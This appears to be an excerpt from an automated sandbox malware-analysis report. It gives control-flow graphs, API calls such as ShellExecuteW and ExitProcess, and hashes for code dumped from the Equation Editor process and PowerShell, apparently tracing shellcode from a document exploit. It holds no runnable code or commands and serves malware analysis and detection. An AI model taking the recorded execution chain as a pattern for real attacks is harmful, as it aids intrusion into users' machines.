      control_flow_graph 30 3510696-35106b0 ShellExecuteW call 35106bb 34 35106b2 30->34 35 351071b-351071f 30->35 38 3510704 34->38 39 35106b4 34->39 36 3510721 35->36 37 3510723 35->37 40 3510725-3510727 36->40 37->40 42 3510729-3510732 37->42 43 3510706-351070a 38->43 44 351070c-3510710 38->44 39->40 41 35106b6-35106c0 ExitProcess 39->41 45 3510737-3510738 40->45 50 3510734 42->50 51 35106fb-35106fe 42->51 43->44 48 3510718 43->48 44->40 49 3510712-3510716 44->49 48->35 49->40 49->48 50->45 51->42 53 3510700 51->53 53->38
      APIs
      • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035106A8
        • Part of subcall function 035106BB: ExitProcess.KERNEL32(00000000), ref: 035106C0
      Memory Dump Source
      • Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd
      Similarity
      • API ID: ExecuteExitProcessShell
      • String ID:
      • API String ID: 1124553745-0
      • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
      • Instruction ID: 820a35b4951386dc3fc84271ca26cfc9ed955ec953492998b8e6bae5139b01e0
      • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
      • Instruction Fuzzy Hash: 78014E5BA5430220F730F2286C55BBAB750FB81740FCC4846E9820B0F5D4A890E38E59

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 54 3510681-351068e call 3510696 58 3510690-35106a8 ShellExecuteW 54->58 59 35106f5-3510701 54->59 60 35106af-35106b0 58->60 61 35106aa call 35106bb 58->61 62 3510704 59->62 65 35106b2 60->65 66 351071b-351071f 60->66 61->60 63 3510706-351070a 62->63 64 351070c-3510710 62->64 63->64 67 3510718 63->67 68 3510712-3510716 64->68 69 3510725-3510727 64->69 65->62 72 35106b4 65->72 70 3510721 66->70 71 3510723 66->71 67->66 68->67 68->69 73 3510737-3510738 69->73 70->69 71->69 75 3510729-3510732 71->75 72->69 74 35106b6-35106c0 ExitProcess 72->74 78 3510734 75->78 79 35106fb-35106fe 75->79 78->73 79->75 81 3510700 79->81 81->62
      Memory Dump Source
      • Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd
      Similarity
      • API ID: ExecuteExitProcessShell
      • String ID:
      • API String ID: 1124553745-0
      • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
      • Instruction ID: bf2fe5566722aae169b804834ea470f7359f1805dc112ec0e2307c44124d4645
      • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
      • Instruction Fuzzy Hash: 35014E2795830520F770E3246C88BAEBB90FBC1744F544456F5520B0F5D6A444E2CA5D

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 82 35105d5-35105d7 LoadLibraryW call 35105ef 84 35105dc-35105e1 82->84 85 3510651-3510662 84->85 86 35105e3-3510650 call 3510668 84->86 86->85
      APIs
      • LoadLibraryW.KERNEL32(035105C7), ref: 035105D5
      Memory Dump Source
      • Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: 48681b26aa219888c69ed59e00b65a126c00e672da5ef575e8c21e86f2352990
      • Instruction ID: bcbf81cd7847ac7c39e781eeb49ba3d887a56147957e928febd8173526399f5d
      • Opcode Fuzzy Hash: 48681b26aa219888c69ed59e00b65a126c00e672da5ef575e8c21e86f2352990
      • Instruction Fuzzy Hash: B111FDA284D7C21FDB1783305D7A610BF653A67104B9D86CEC0C60A8E3E399A1A2C797

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 92 35106bb-35106c0 ExitProcess
      APIs
      • ExitProcess.KERNEL32(00000000), ref: 035106C0
      Memory Dump Source
      • Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd
      Similarity
      • API ID: ExitProcess
      • String ID:
      • API String ID: 621844428-0
      • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
      • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
      • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
      • Instruction Fuzzy Hash:

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 114 35106c2-35106cd GetPEB 115 35106d0-35106e1 call 35106ea 114->115 118 35106e3-35106e7 115->118
      Memory Dump Source
      • Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
      • Instruction ID: d0353fc7b652820521e765d69c763c276089ef88af9379dc4a9f38fbc61b105a
      • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
      • Instruction Fuzzy Hash: FCD01C352226028BE204DB04D980A1AF36AFBE8210B28C268E0004B669C330E8E2CAD0

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 119 351050a-3510531 ExitProcess call 3510523 call 351053f 124 3510584-35105a0 119->124 125 3510534-3510539 119->125 128 35105a1-35105be 124->128 125->128 129 351053c-351054d 125->129 132 35105bf-35105c6 129->132 133 351054f-3510554 129->133 135 35105c7-35105d3 132->135 133->132 134 3510556 133->134 134->135 136 3510558-3510581 call 35105c0 134->136 136->124
      APIs
      • ExitProcess.KERNEL32(035104F8), ref: 0351050A
      Memory Dump Source
      • Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd
      Similarity
      • API ID: ExitProcess
      • String ID:
      • API String ID: 621844428-0
      • Opcode ID: 12cf264c11133a006bfa609b62c23bcac22e4182928f15dc94cf98a0fa50bc11
      • Instruction ID: 2a3e6e06bbd928a624a1fca9cc6ee55bbd05f51d6e7a383609d0598ee66e16fb
      • Opcode Fuzzy Hash: 12cf264c11133a006bfa609b62c23bcac22e4182928f15dc94cf98a0fa50bc11
      • Instruction Fuzzy Hash: 1121BB9980E7C10FE302D230AAAA101FF607A1300471E86CEC4C60F4F7E79595A6D396
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: 0;J$0;J$4'p$4'p$4'p$4'p$8#@f$8#@f$tPp$tPp$$p$$p$$p$$p$$p$$p$$p$$p$$p$[Bf$[Bf
      • API String ID: 0-27351058
      • Opcode ID: 77e7fde0f59e3aa324c0bb88709ba0676825540a159975a5d8835bf3df287f9f
      • Instruction ID: 500b4133a2baa2fb912d447f691ae716602f5a941fe65b5e1341065653607ae0
      • Opcode Fuzzy Hash: 77e7fde0f59e3aa324c0bb88709ba0676825540a159975a5d8835bf3df287f9f
      • Instruction Fuzzy Hash: 131238397043009FDBA59A298850F7BBBE1AFC6310F28846FD545CB362DA79DC42C766
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: 89J$tPp$tPp$x;J
      • API String ID: 0-1455956576
      • Opcode ID: d7892d7b194512c2e819246e753e48976fb11569ff95e3aa82f232dfc7957a7b
      • Instruction ID: 78a4c4c07b119f1f6e31e3f0671e3ea4d51fdc2ab29e2e7654899b220c97111f
      • Opcode Fuzzy Hash: d7892d7b194512c2e819246e753e48976fb11569ff95e3aa82f232dfc7957a7b
      • Instruction Fuzzy Hash: 6261D535604210DFC7649A69C851F6ABBA2EFC6310F24846FE548DB392CA76DC82C795
      Memory Dump Source
      • Source File: 00000006.00000002.358308302.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_310000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f6e13c21541d1d3af39680109f712e19660714562c1d42c59975857716887b86
      • Instruction ID: ac132d0eea5b7d3aea1c1e98d3d37ae4e61971f2b8c3e7f95c2b6615b22f972f
      • Opcode Fuzzy Hash: f6e13c21541d1d3af39680109f712e19660714562c1d42c59975857716887b86
      • Instruction Fuzzy Hash: 18425070A053889FCB0ACF68D894ADDBFF1AF49314F19849AE454AB362C734DD86CB51
      Memory Dump Source
      • Source File: 00000006.00000002.358308302.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_310000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b5f3dffe8ce4400c7aa73813f8e1ad35c14ea58a92f977f6a720824041a49327
      • Instruction ID: 885096aa7ecaaa6d715e30446688a19c2348ab984e0fc4f3a1d21ea4a3b6717d
      • Opcode Fuzzy Hash: b5f3dffe8ce4400c7aa73813f8e1ad35c14ea58a92f977f6a720824041a49327
      • Instruction Fuzzy Hash: E5510874A00209AFDB05DBA8D484AEDFBF2BF88314F28C559E404AB355C735ED86CB90
      Memory Dump Source
      • Source File: 00000006.00000002.358308302.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_310000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2cc6806b635d6fb016013bd42ad8e1457c843a7fe0b6f7547f2befd7ad79233f
      • Instruction ID: 37bb3f2964bf3d4202111168bf2ebbe0dcfd7d0914e5b9a7133933505a09ffaa
      • Opcode Fuzzy Hash: 2cc6806b635d6fb016013bd42ad8e1457c843a7fe0b6f7547f2befd7ad79233f
      • Instruction Fuzzy Hash: 96312A75A042059FCB09CF5CC4809AAFBF1FF89310B658299E914E7755D731ED91CB90
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7b21b76687fcb0d8aea5906804e6d49714280088361a61990d72d3b8b77ec9e7
      • Instruction ID: 59bd28f4581bb9d2818b6e633aaf381c511ff118d2e55dd60819a008715d02a0
      • Opcode Fuzzy Hash: 7b21b76687fcb0d8aea5906804e6d49714280088361a61990d72d3b8b77ec9e7
      • Instruction Fuzzy Hash: 001121603083846FC7551A754829B6B7EA59F87700F1988AFF540DF2D3CAA98C858366
      Memory Dump Source
      • Source File: 00000006.00000002.358308302.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_310000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 63190f1f386d4527d3335e2a8a40042d221dd82d56e72d32c479320f434f59d1
      • Instruction ID: 30356bd871ff02274de6727212afdba5dc087582215fcf4b073a72856d4f0d23
      • Opcode Fuzzy Hash: 63190f1f386d4527d3335e2a8a40042d221dd82d56e72d32c479320f434f59d1
      • Instruction Fuzzy Hash: 98111974A00208AFDB05DBA8D484FDDBBF5AF48314F24C859E404AB351C775ED86CB50
      Memory Dump Source
      • Source File: 00000006.00000002.358265398.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 703a38e28a6c25ee79ba82a1161c2ead5efe6f50c324415215b6e6fc4a62f76c
      • Instruction ID: 5cd79eca3bad77c44f2ab4d8031e5629565540a1e4cbf6b34546547477cc7170
      • Opcode Fuzzy Hash: 703a38e28a6c25ee79ba82a1161c2ead5efe6f50c324415215b6e6fc4a62f76c
      • Instruction Fuzzy Hash: E501DF71504340ABE7204E29EC84B66BF98EF81324F28845BFC484A386C7799845CAB1
      Memory Dump Source
      • Source File: 00000006.00000002.358265398.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 036e54bc4e32febdacd51ff0f57ad126624da0e6d9af92cffbc33c2c03ea42c5
      • Instruction ID: c4e633fff72db57db94713e3665d56a326979c1ecd8f4ae64f87de7371cfb80e
      • Opcode Fuzzy Hash: 036e54bc4e32febdacd51ff0f57ad126624da0e6d9af92cffbc33c2c03ea42c5
      • Instruction Fuzzy Hash: CF01526140D3C05FD7124B259C94B62BFA4DF53224F1981DBE8848F297C2699C48C772
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 81c359f42d2d92fc8b399b71484b8e5ccc709f843f58b16741a0ed944baf6c72
      • Instruction ID: b2363364f4fb37fc781c751c8fa4a8cd3fda4b8dcb997946c1111f3988ee5d99
      • Opcode Fuzzy Hash: 81c359f42d2d92fc8b399b71484b8e5ccc709f843f58b16741a0ed944baf6c72
      • Instruction Fuzzy Hash: 08F0287074020837C6642AA54805F7F689ADFD9700F10841DF905AF3C1DDF69C424365
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: 4'p$4'p$4:J$4:J$8#@f$8#@f$8#@f$8#@f$8#@f$8#@f$h%Bf$h%Bf$$p$$p$$p$$p$9J$9J
      • API String ID: 0-1002509357
      • Opcode ID: 001b20e0ef4d9cd270e48360e33f4de52e6e74bc6e4803b5d0aac20d48f14937
      • Instruction ID: 89df7df98dd19922584051d6bf9d8030dfeca1d0c61086d50c6ea3e53734b17e
      • Opcode Fuzzy Hash: 001b20e0ef4d9cd270e48360e33f4de52e6e74bc6e4803b5d0aac20d48f14937
      • Instruction Fuzzy Hash: 5BC1E539B002109FD7589B68D450F6BBBE2AFC6310B28807FD945CB362DA39CD42C795
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: ($4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$`8J$`8J$`8J$x$x$$p$$p
      • API String ID: 0-2840146388
      • Opcode ID: 66a9072794c47d0963f9b862aad9b8cab84262ba5dfedc7714ce25fb7cbd1aac
      • Instruction ID: 9408e3a18492ea58355d79891146f594e40419787495cfa1dc906928beda2c15
      • Opcode Fuzzy Hash: 66a9072794c47d0963f9b862aad9b8cab84262ba5dfedc7714ce25fb7cbd1aac
      • Instruction Fuzzy Hash: 1ED12839700204DFDB699E68D854B6F7BA2ABC4300F18847FE9419B391CB79CD42C796
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: L4p$L4p$L4p$\9J$\9J$\9J$$p$$p
      • API String ID: 0-1096752444
      • Opcode ID: dd321d84ad1c0bd0c791deff499c06e5cbcf8d9ef7cd222875d33c44c4dfa553
      • Instruction ID: c340348f8e35df77fa379bc4e155630748a1b1fa3a673662278f64b7ece70e14
      • Opcode Fuzzy Hash: dd321d84ad1c0bd0c791deff499c06e5cbcf8d9ef7cd222875d33c44c4dfa553
      • Instruction Fuzzy Hash: 34712939701204DFDB599E68D850BAF7BA2AFC0300F14846BE9158B391DB79DD42CBA6
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: <8J$L4p$L4p$L4p$`8J$`8J
      • API String ID: 0-2160452193
      • Opcode ID: a3b4c106e8fc474f27e6c2a0135f85a08335bb989e832b3cc971b2e3137c5afa
      • Instruction ID: 398387af2d67ae94a8d463bb6c164dc95252d5501ce58fd011df2727c82e3a6d
      • Opcode Fuzzy Hash: a3b4c106e8fc474f27e6c2a0135f85a08335bb989e832b3cc971b2e3137c5afa
      • Instruction Fuzzy Hash: 25510879A04384DFDB568B14D814B6A7BA2AF41300F1E80ABD8409B3E2CB7DCD45CB56
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: 4'p$51$9J$9J
      • API String ID: 0-3616965108
      • Opcode ID: ef0d844d3533d3a6e7a305474770bc235bc9941b78303a2c7ccecceb06ee6c9f
      • Instruction ID: e57a30f45f77579009025ba9014f20585a21995924c84a936f133f0d8ff2fe29
      • Opcode Fuzzy Hash: ef0d844d3533d3a6e7a305474770bc235bc9941b78303a2c7ccecceb06ee6c9f
      • Instruction Fuzzy Hash: 4941C338A042808FD769CB289450F66BBB1AF97314B1980AFD9058F373D739DC46C75A
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: 4'p$4'p$X:J$X:J
      • API String ID: 0-2228261933
      • Opcode ID: 67a234f17c5eac8755d1669bb3f5c3371028f98ce003f396fcb8491bd74be996
      • Instruction ID: 02844250bad90422626b39ff282cc63d8dc9e584f0c11f174390ff641288dab9
      • Opcode Fuzzy Hash: 67a234f17c5eac8755d1669bb3f5c3371028f98ce003f396fcb8491bd74be996
      • Instruction Fuzzy Hash: 1A212D34704300ABDB68AA6D8450F7B7A97AFD6311F64803EE9498B391CE75CC42C365
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: $p$$p$$p$$p
      • API String ID: 0-3121760203
      • Opcode ID: a7a5b7a2ab6e2a712d315406d37bce45ce95a7242e1dabfa8a16ab8b6b17689d
      • Instruction ID: be70e8fc16a96cc62df6c7cd8be6d293120648f75c6e7c526695969213fe14da
      • Opcode Fuzzy Hash: a7a5b7a2ab6e2a712d315406d37bce45ce95a7242e1dabfa8a16ab8b6b17689d
      • Instruction Fuzzy Hash: 9921F4399043019FDBB18E158A40F7BBBB0AF95311F28416FD95487262D7F98845C75A
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: $p$$p$$p$$p
      • API String ID: 0-3121760203
      • Opcode ID: 5167e874d036c5137a30268e1db6c95ac57e221b17d02649ec5ba952754ec667
      • Instruction ID: 11920d1928a9e1a22e8d067ef4054bda5f8ab3977e1fd08d458a6598122db64a
      • Opcode Fuzzy Hash: 5167e874d036c5137a30268e1db6c95ac57e221b17d02649ec5ba952754ec667
      • Instruction Fuzzy Hash: E721A439A003059FDBB08E16C640F7BBBE4AB95311F68412FD91497322D7F9C841C75A